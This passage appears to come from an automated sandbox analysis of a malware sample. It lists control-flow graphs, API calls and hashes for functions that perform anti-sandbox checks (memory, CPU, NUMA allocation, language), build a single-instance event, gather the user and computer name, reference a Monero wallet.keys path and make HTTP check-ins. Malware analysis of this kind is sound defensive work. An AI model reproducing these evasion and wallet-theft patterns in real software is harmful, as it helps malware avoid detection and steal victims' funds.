                              control_flow_graph 1090 825760-8257c7 call 825d20 call 82ab30 * 3 call 82aa50 * 4 1106 8257cc-8257d3 1090->1106 1107 825827-82589c call 82aa50 * 2 call 811590 call 825510 call 82abb0 call 82ab10 call 82ade0 StrCmpCA 1106->1107 1108 8257d5-825806 call 82ab30 call 82aab0 call 811590 call 825440 1106->1108 1134 8258e3-8258f9 call 82ade0 StrCmpCA 1107->1134 1137 82589e-8258de call 82aab0 call 811590 call 825440 call 82abb0 call 82ab10 1107->1137 1124 82580b-825822 call 82abb0 call 82ab10 1108->1124 1124->1134 1140 8258ff-825906 1134->1140 1141 825a2c-825a94 call 82abb0 call 82ab30 * 2 call 8116b0 call 82ab10 * 4 call 811670 call 811550 1134->1141 1137->1134 1142 825a2a-825aaf call 82ade0 StrCmpCA 1140->1142 1143 82590c-825913 1140->1143 1272 825d13-825d16 1141->1272 1161 825be1-825c49 call 82abb0 call 82ab30 * 2 call 8116b0 call 82ab10 * 4 call 811670 call 811550 1142->1161 1162 825ab5-825abc 1142->1162 1146 825915-825969 call 82ab30 call 82aab0 call 811590 call 825440 call 82abb0 call 82ab10 1143->1146 1147 82596e-8259e3 call 82aa50 * 2 call 811590 call 825510 call 82abb0 call 82ab10 call 82ade0 StrCmpCA 1143->1147 1146->1142 1147->1142 1250 8259e5-825a25 call 82aab0 call 811590 call 825440 call 82abb0 call 82ab10 1147->1250 1161->1272 1167 825ac2-825ac9 1162->1167 1168 825bdf-825c64 call 82ade0 StrCmpCA 1162->1168 1174 825b23-825b98 call 82aa50 * 2 call 811590 call 825510 call 82abb0 call 82ab10 call 82ade0 StrCmpCA 1167->1174 1175 825acb-825b1e call 82ab30 call 82aab0 call 811590 call 825440 call 82abb0 call 82ab10 1167->1175 1197 825c66-825c71 Sleep 1168->1197 1198 825c78-825ce1 call 82abb0 call 82ab30 * 2 call 8116b0 call 82ab10 * 4 call 811670 call 811550 1168->1198 1174->1168 1276 825b9a-825bda call 82aab0 call 811590 call 825440 call 82abb0 call 82ab10 1174->1276 1175->1168 1197->1106 1198->1272 1250->1142 1276->1168
                              APIs
                                • Part of subcall function 0082AB30: lstrlen.KERNEL32(00814F55,?,?,00814F55,00830DDF), ref: 0082AB3B
                                • Part of subcall function 0082AB30: lstrcpy.KERNEL32(00830DDF,00000000), ref: 0082AB95
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00825894
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008258F1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00825AA7
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 00825440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00825478
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 00825510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00825568
                                • Part of subcall function 00825510: lstrlen.KERNEL32(00000000), ref: 0082557F
                                • Part of subcall function 00825510: StrStrA.SHLWAPI(00000000,00000000), ref: 008255B4
                                • Part of subcall function 00825510: lstrlen.KERNEL32(00000000), ref: 008255D3
                                • Part of subcall function 00825510: lstrlen.KERNEL32(00000000), ref: 008255FE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008259DB
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00825B90
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00825C5C
                              • Sleep.KERNEL32(0000EA60), ref: 00825C6B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 8b323584ebe5218c7cf9c4428b86284d4d7d483367dc5970a5951129e92b4854
                              • Instruction ID: aa9f5300944aae224c15a7ae0bbf5db13c7eb492c44ab0c0555320d4231fc8af
                              • Opcode Fuzzy Hash: 8b323584ebe5218c7cf9c4428b86284d4d7d483367dc5970a5951129e92b4854
                              • Instruction Fuzzy Hash: 3DE130719101289BCB18FBA8FDA7AED733DFF54340F408558A506E6191EF356A88CB93
                              Function 008219F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 8219f0-821a1d call 82ade0 StrCmpCA 1304 821a27-821a41 call 82ade0 1301->1304 1305 821a1f-821a21 ExitProcess 1301->1305 1309 821a44-821a48 1304->1309 1310 821c12-821c1d call 82ab10 1309->1310 1311 821a4e-821a61 1309->1311 1313 821a67-821a6a 1311->1313 1314 821bee-821c0d 1311->1314 1316 821b82-821b93 StrCmpCA 1313->1316 1317 821b63-821b74 StrCmpCA 1313->1317 1318 821bc0-821bd1 StrCmpCA 1313->1318 1319 821b41-821b52 StrCmpCA 1313->1319 1320 821ba1-821bb2 StrCmpCA 1313->1320 1321 821a85-821a94 call 82ab30 1313->1321 1322 821acf-821ae0 StrCmpCA 1313->1322 1323 821aad-821abe StrCmpCA 1313->1323 1324 821a71-821a80 call 82ab30 1313->1324 1325 821a99-821aa8 call 82ab30 1313->1325 1326 821b1f-821b30 StrCmpCA 1313->1326 1327 821bdf-821be9 call 82ab30 1313->1327 1328 821afd-821b0e StrCmpCA 1313->1328 1314->1309 1335 821b95-821b98 1316->1335 1336 821b9f 1316->1336 1333 821b80 1317->1333 1334 821b76-821b79 1317->1334 1340 821bd3-821bd6 1318->1340 1341 821bdd 1318->1341 1331 821b54-821b57 1319->1331 1332 821b5e 1319->1332 1337 821bb4-821bb7 1320->1337 1338 821bbe 1320->1338 1321->1314 1348 821ae2-821aec 1322->1348 1349 821aee-821af1 1322->1349 1346 821ac0-821ac3 1323->1346 1347 821aca 1323->1347 1324->1314 1325->1314 1329 821b32-821b35 1326->1329 1330 821b3c 1326->1330 1327->1314 1350 821b10-821b13 1328->1350 1351 821b1a 1328->1351 1329->1330 1330->1314 1331->1332 1332->1314 1333->1314 1334->1333 1335->1336 1336->1314 1337->1338 1338->1314 1340->1341 1341->1314 1346->1347 1347->1314 1355 821af8 1348->1355 1349->1355 1350->1351 1351->1314 1355->1314
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 00821A15
                              • ExitProcess.KERNEL32 ref: 00821A21
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 984ccd8a40542492845a6d68694d08657260282024a09124a393dd69682ae485
                              • Instruction ID: 27543d7097bb185256f7d3bf5f6fe37aca13c805411589360b1bc708337860ab
                              • Opcode Fuzzy Hash: 984ccd8a40542492845a6d68694d08657260282024a09124a393dd69682ae485
                              • Instruction Fuzzy Hash: 8C514078A04219AFCF04DFE4E998AAE77B9FF54704F604148E512EB250E774E981CB52
                              Function 00826C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F0750), ref: 00829BF1
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F0570), ref: 00829C0A
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F07C8), ref: 00829C22
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F05A0), ref: 00829C3A
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F07F8), ref: 00829C53
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F8B50), ref: 00829C6B
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015E64E0), ref: 00829C83
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015E6300), ref: 00829C9C
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F05B8), ref: 00829CB4
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F0678), ref: 00829CCC
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F05E8), ref: 00829CE5
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F0588), ref: 00829CFD
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015E6320), ref: 00829D15
                                • Part of subcall function 00829BB0: GetProcAddress.KERNEL32(75900000,015F0600), ref: 00829D2E
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 008111D0: ExitProcess.KERNEL32 ref: 00811211
                                • Part of subcall function 00811160: GetSystemInfo.KERNEL32(?), ref: 0081116A
                                • Part of subcall function 00811160: ExitProcess.KERNEL32 ref: 0081117E
                                • Part of subcall function 00811110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0081112B
                                • Part of subcall function 00811110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00811132
                                • Part of subcall function 00811110: ExitProcess.KERNEL32 ref: 00811143
                                • Part of subcall function 00811220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0081123E
                                • Part of subcall function 00811220: ExitProcess.KERNEL32 ref: 00811294
                                • Part of subcall function 00826A10: GetUserDefaultLangID.KERNEL32 ref: 00826A14
                                • Part of subcall function 00811190: ExitProcess.KERNEL32 ref: 008111C6
                                • Part of subcall function 008279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008111B7), ref: 00827A10
                                • Part of subcall function 008279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00827A17
                                • Part of subcall function 008279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00827A2F
                                • Part of subcall function 00827A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827AA0
                                • Part of subcall function 00827A70: RtlAllocateHeap.NTDLL(00000000), ref: 00827AA7
                                • Part of subcall function 00827A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00827ABF
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015F8BA0,?,008310F4,?,00000000,?,008310F8,?,00000000,00830AF3), ref: 00826D6A
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00826D88
                              • CloseHandle.KERNEL32(00000000), ref: 00826D99
                              • Sleep.KERNEL32(00001770), ref: 00826DA4
                              • CloseHandle.KERNEL32(?,00000000,?,015F8BA0,?,008310F4,?,00000000,?,008310F8,?,00000000,00830AF3), ref: 00826DBA
                              • ExitProcess.KERNEL32 ref: 00826DC2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2931873225-0
                              • Opcode ID: 251b7b3e76787050e5ab25cab7724b31ddadd2fcaed94ace421093fb333cb668
                              • Instruction ID: e67dbda377f51459e01fbb44c7ed419a378bec45cf22b44278a287389769301b
                              • Opcode Fuzzy Hash: 251b7b3e76787050e5ab25cab7724b31ddadd2fcaed94ace421093fb333cb668
                              • Instruction Fuzzy Hash: 20310770A04228ABCB08FBE8EC66AEE7379FF44310F400918F512E6191EF706985C663
                              Function 00826D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 826d93 1437 826daa 1436->1437 1439 826d5a-826d77 call 82ade0 OpenEventA 1437->1439 1440 826dac-826dc2 call 826bc0 call 825d60 CloseHandle ExitProcess 1437->1440 1445 826d95-826da4 CloseHandle Sleep 1439->1445 1446 826d79-826d91 call 82ade0 CreateEventA 1439->1446 1445->1437 1446->1440
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015F8BA0,?,008310F4,?,00000000,?,008310F8,?,00000000,00830AF3), ref: 00826D6A
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00826D88
                              • CloseHandle.KERNEL32(00000000), ref: 00826D99
                              • Sleep.KERNEL32(00001770), ref: 00826DA4
                              • CloseHandle.KERNEL32(?,00000000,?,015F8BA0,?,008310F4,?,00000000,?,008310F8,?,00000000,00830AF3), ref: 00826DBA
                              • ExitProcess.KERNEL32 ref: 00826DC2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 846f669d699c0bedbeeb1ce6b3197170266dca56a08329fde27951252fbbc154
                              • Instruction ID: 1313a5689c4aac86194dfae74d602ad64e2f424b658b93e9f71b8d88e0b83cc4
                              • Opcode Fuzzy Hash: 846f669d699c0bedbeeb1ce6b3197170266dca56a08329fde27951252fbbc154
                              • Instruction Fuzzy Hash: 10F03A30A4822DEFEB04EBE0FC4ABBD3274FF04705F500615B912E91A0EBB15981CA52
                              Function 00814800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814889
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00814899
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 5610472ce2b1f5a223d61fb9bccafe3ba16aa15ae55d0d8d0b6ae460f4e2d286
                              • Instruction ID: 64b622a4526161c7e5afba59b7271c84d6b906f89cdfd4882e9e16d96bf482eb
                              • Opcode Fuzzy Hash: 5610472ce2b1f5a223d61fb9bccafe3ba16aa15ae55d0d8d0b6ae460f4e2d286
                              • Instruction Fuzzy Hash: 12215EB1D00209ABDF14DFA5EC49ADE7B75FF04320F408625F915A7290EB706A0ACB81
                              Function 00825440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 008162D0: InternetOpenA.WININET(00830DFF,00000001,00000000,00000000,00000000), ref: 00816331
                                • Part of subcall function 008162D0: StrCmpCA.SHLWAPI(?,015FE430), ref: 00816353
                                • Part of subcall function 008162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00816385
                                • Part of subcall function 008162D0: HttpOpenRequestA.WININET(00000000,GET,?,015FDAB8,00000000,00000000,00400100,00000000), ref: 008163D5
                                • Part of subcall function 008162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0081640F
                                • Part of subcall function 008162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00816421
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00825478
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: bab9c5417bcfb1abea9a3e7a797ecfa1e4229d6c71f7fb219c7fde8103f64e62
                              • Instruction ID: cb01dcf89ad75522bc41700d6ac6d8856c558fb21f38a834d67dc1bb7c755f9d
                              • Opcode Fuzzy Hash: bab9c5417bcfb1abea9a3e7a797ecfa1e4229d6c71f7fb219c7fde8103f64e62
                              • Instruction Fuzzy Hash: C11121709004189BCB18FFA8E996AED7339FF50340F804558F91AD7592EF30AB84C693
                              Function 00811220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1493 811220-811247 call 828b40 GlobalMemoryStatusEx 1496 811273-81127a 1493->1496 1497 811249-811271 call 82dd30 * 2 1493->1497 1499 811281-811285 1496->1499 1497->1499 1501 811287 1499->1501 1502 81129a-81129d 1499->1502 1504 811292-811294 ExitProcess 1501->1504 1505 811289-811290 1501->1505 1505->1502 1505->1504
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0081123E
                              • ExitProcess.KERNEL32 ref: 00811294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
